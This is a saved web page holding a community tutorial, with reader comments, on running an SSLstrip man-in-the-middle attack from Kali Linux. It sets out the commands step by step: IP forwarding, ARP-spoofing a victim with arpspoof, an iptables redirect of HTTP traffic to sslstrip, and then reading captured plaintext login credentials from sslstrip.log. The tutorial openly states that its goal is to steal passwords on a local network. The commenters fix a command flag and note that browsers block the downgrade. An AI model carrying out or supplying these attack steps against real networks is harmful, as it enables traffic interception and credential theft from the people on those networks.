MITM: sslstrip
Sumber: https://www.cybrary.it/0p3n/sslstrip-in-man-in-the-middle-attack/
Cybrary
Courses Certification 0P3N CH4NN3LS Explore Teams
Tutorial: Using SSLSTRIP in a “Man in the Middle” Attack Profile image for skyle17 fr4nc1stein June 23, 2015 | Views: 45270 Save Email Begin Learning Cyber Security for FREE Now! FREE REGISTRATIONAlready a Member Login Here SSLSTRIP in a Man in the Middle Attack
Hello guys,
In this tutorial, I’m going to teach you how to use a SSLSTRIP via the Kali OS.
We’ll use SSLSTRIP for sniff or steal password in a Target PC via LAN (Local Area Network). SSLSTRIP is known in hijacking HTTP traffic on a network. For testing, we’ll try to use VMWARE and download the Kali Operating System. I’m using BT5 (Backtrack) in my presentation.
Requirements:
1. Kali OS – Click here
2. Syntax Code from the Author of the SSLSTRIP
3. Common sense
We’re assuming SSLSTRIP is already installed in Kali Operating system:
Step 1: Open Terminal
Step 2: In order to run SSLSTRIP in MITM, you need to know the Target IP and the IP of Gateway of the router. To find the router gateway IP, here’s the code:
route -n
or
netstat -nr
Step 3: Port forward for accept packets and forward as vise versa
disabled = 0
enabled = 1
Code: echo “1” > /proc/sys/net/ipv4/ip_forward
See image below:
image 1
Step 4: In a real attack, we’d be using ARPSPOOF against the layer 2 segments. In the images below, I modified the $routerip, but we make a simple instruction. At step 2, we find the router IP is 192.168.109.2. To use ARSPOOF, follow this code.
Code: arpspoof -i eth0 -t victimip routerip
See images below:
image 2 three 3
Note: The $routerip was already modified in advanced tutorial. Don’t follow the image – you can use this example:
Code: arpspoof -t eth0 -t 192.168.109.18 192.168.109.2
192.168.109.18 = victim ip
192.168.109.2 =router ip or gateway
Step 5: Modify the IP table. Let’s understand iptables: iptables take traffic inbound to our Kali Linux machine, on which the destination is port 80 (also known as the HTTP web port. It redirects traffic to the port 1000, which is listening through the use of SSLSTRIP).
Code: iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-port 1000
See image below:
imahe 4
Step 6: Voila, peak time. We’re going to open our SSLSTRIP.
In Kali:
Application -> kali linux -> information gathering ->sslstrip analysis – >sslstrip
In BT:
Application -> Backtrack -> Exploitation tools -> Web Exploitation Tools ->ssltrip
See the image below: image 5
Run the following to start the SSLSTRIP, which we set at port 1000.
In Kali: Code: sslstrip -l 1000
In BT: Code: python sslstrip.pl –l 1000
Step 7: An example of Victim login at hotmail.com.
See image below: image 6
Step 8: Open the sslstrip.log
See image below:
image 7
The username and password is in cleartext – the blur portion in picture.
Thank you!
Regards from Philippine Security Researcher
/fr4nc1stein
/skyle17 Share and Earn Cybytes FacebookTwitterGoogle+LinkedInEmail Save +1 8 18 Use Cybytes and Tip the Author! Join Share and Earn Cybytes FacebookTwitterGoogle+LinkedInEmail Ready to share your knowledge and expertise? Submit to 0P3N Looking to train your own company? Sign up now using Cybrary Teams! Get access to:
Unlimited Certificates of Completion Unlimited Micro Certification Tests Practical CTF Style Assessments 120 Hands-on Virtual Security Labs
Learn More 18 Comments
Profile image for mrdnf mrdnf 11:27 am on August 24, 2016
I followed the instructions but there was nothing in sslstrip.log; any idea please? This is my Kali’s version: Linux kaliv2 4.0.0-kali1-amd64 #1 SMP Debian 4.0.4-1+kali2 (2015-06-03) x86_64 GNU/Linux
and Win7 client: Host Name: WIN7 OS Name: Microsoft Windows 7 Enterprise OS Version: 6.1.7600 N/A Build 7600 OS Manufacturer: Microsoft Corporation OS Configuration: Member Workstation OS Build Type: Multiprocessor Free Registered Owner: Registered Organization: Product ID: 55041-049-8865546-86969 Original Install Date: 4/15/2010, 4:29:26 PM System Boot Time: 8/24/2016, 7:08:18 PM System Manufacturer: VMware, Inc. System Model: VMware Virtual Platform System Type: X86-based PC Processor(s): 1 Processor(s) Installed. [01]: x64 Family 6 Model 42 Stepping 7 GenuineIntel ~ 2195 Mhz BIOS Version: Phoenix Technologies LTD 6.00, 5/20/2014 Windows Directory: C:\Windows System Directory: C:\Windows\system32 Boot Device: \Device\HarddiskVolume1 System Locale: en-us;English (United States) Input Locale: en-us;English (United States) Time Zone: Total Physical Memory: 511 MB Available Physical Memory: 298 MB Virtual Memory: Max Size: 1,535 MB Virtual Memory: Available: 879 MB Virtual Memory: In Use: 656 MB Page File Location(s): C:\pagefile.sys Domain: Logon Server: Hotfix(s): N/A Network Card(s): 1 NIC(s) Installed. [01]: Intel(R) PRO/1000 MT Network Connection Connection Name: Local Area Connection 2 DHCP Enabled: Yes DHCP Server: 192.168.234.254 IP address(es) [01]: 192.168.234.137 Log in to Reply Profile image for zaakkniight zaakkniight 9:25 am on August 15, 2016
arpspoof -t eth0 -t 192.168.109.18 192.168.109.2 arpspoof -i eth0 -t 192.168.109.18 192.168.109.2 (I for interface) Log in to Reply Profile image for mattbelle mattbelle 12:11 pm on July 23, 2016
the target’s browser gives a warning telling the victim that this site isn’t secured and refuses to proceed
Log in to Reply
Profile image for grench
Grench
7:42 pm on September 20, 2016
That is a problem
Log in to Reply
Profile image for du54nr
Du54nR
4:45 pm on May 4, 2016
Is it also working with https (443) links ? Facebook like ?
Log in to Reply
Profile image for phexcom
TYEB
3:56 pm on June 24, 2016
What it does is that it actually removes the https and replace it with http. Like the name implies SSLstrip. So it just strip off the ssl
Log in to Reply
Profile image for
ken94
12:38 pm on April 29, 2016
i think it works on only old versions of browsers,i do update my system,softwares so my my browser firefox stub 46.0 (latest currently)does not fall for the attack,gives some errors when i attempt to open https sites!
Log in to Reply
Profile image for grench
Grench
7:44 pm on September 20, 2016
Firefox is really secure and updated with frequency to detect MITM attacks.
Log in to Reply
Page 3 of 3«123 Comment on This
You must be logged in to post a comment. Related Reads Effective Information Gathering Yields Successful ... Profile image for gh4d3r June 18, 2015 By: GH4D3R 815 The Penetration Testers Framework (PTF) Profile image for grotherus April 15, 2016 By: Johan Grotherus 8626 New Players on the Field January 30, 2017 By: CyberHat 28 ThreatQ 3.0 Adheres to Einstein’s 3 Rules to Str ... February 2, 2017 By: ThreatQuotient 51 Our Revolution We believe Cyber Security training should be free, for everyone, FOREVER. Everyone, everywhere, deserves the OPPORTUNITY to learn, begin and grow a career in this fascinating field. Therefore, Cybrary is a free community where people, companies and training come together to give everyone the ability to collaborate in an open source way that is revolutionizing the cyber security educational experience. Student Support Get Support Other Pages
About The Team Join Our Team Press Terms of Service Verify Certificate Archived Cybrary Courses Submit Suggestions Companies
Cybrary On The Go
Get the Cybrary app for Android for online and offline viewing of our lessons. Get it on Google Play
Support Cybrary
Donate Here to Get This Month's Donor Badge
Cybrary|0P3N Profile image for spiritedwolf spiritedwolf [Part 2]$~Metasploit for Beginners Views: 1278 / April 3, 2017 Profile image for gurubaran gurubaran A Penetration Testing Checklist For Linux Machine – Intrusion Discovery Views: 1477 / April 3, 2017 Profile image for dollar163 Hari Charan HTML Injection Reflected – POST Views: 2567 / April 2, 2017 Profile image for chiheb chiheb chebbi Escaping Linux CHROOT Jail Views: 1842 / April 1, 2017
FOLLOW US:
© 2016 Cybrary.IT - Privacy Policy - Terms of Service Back to Top Skip to toolbar
Log in Register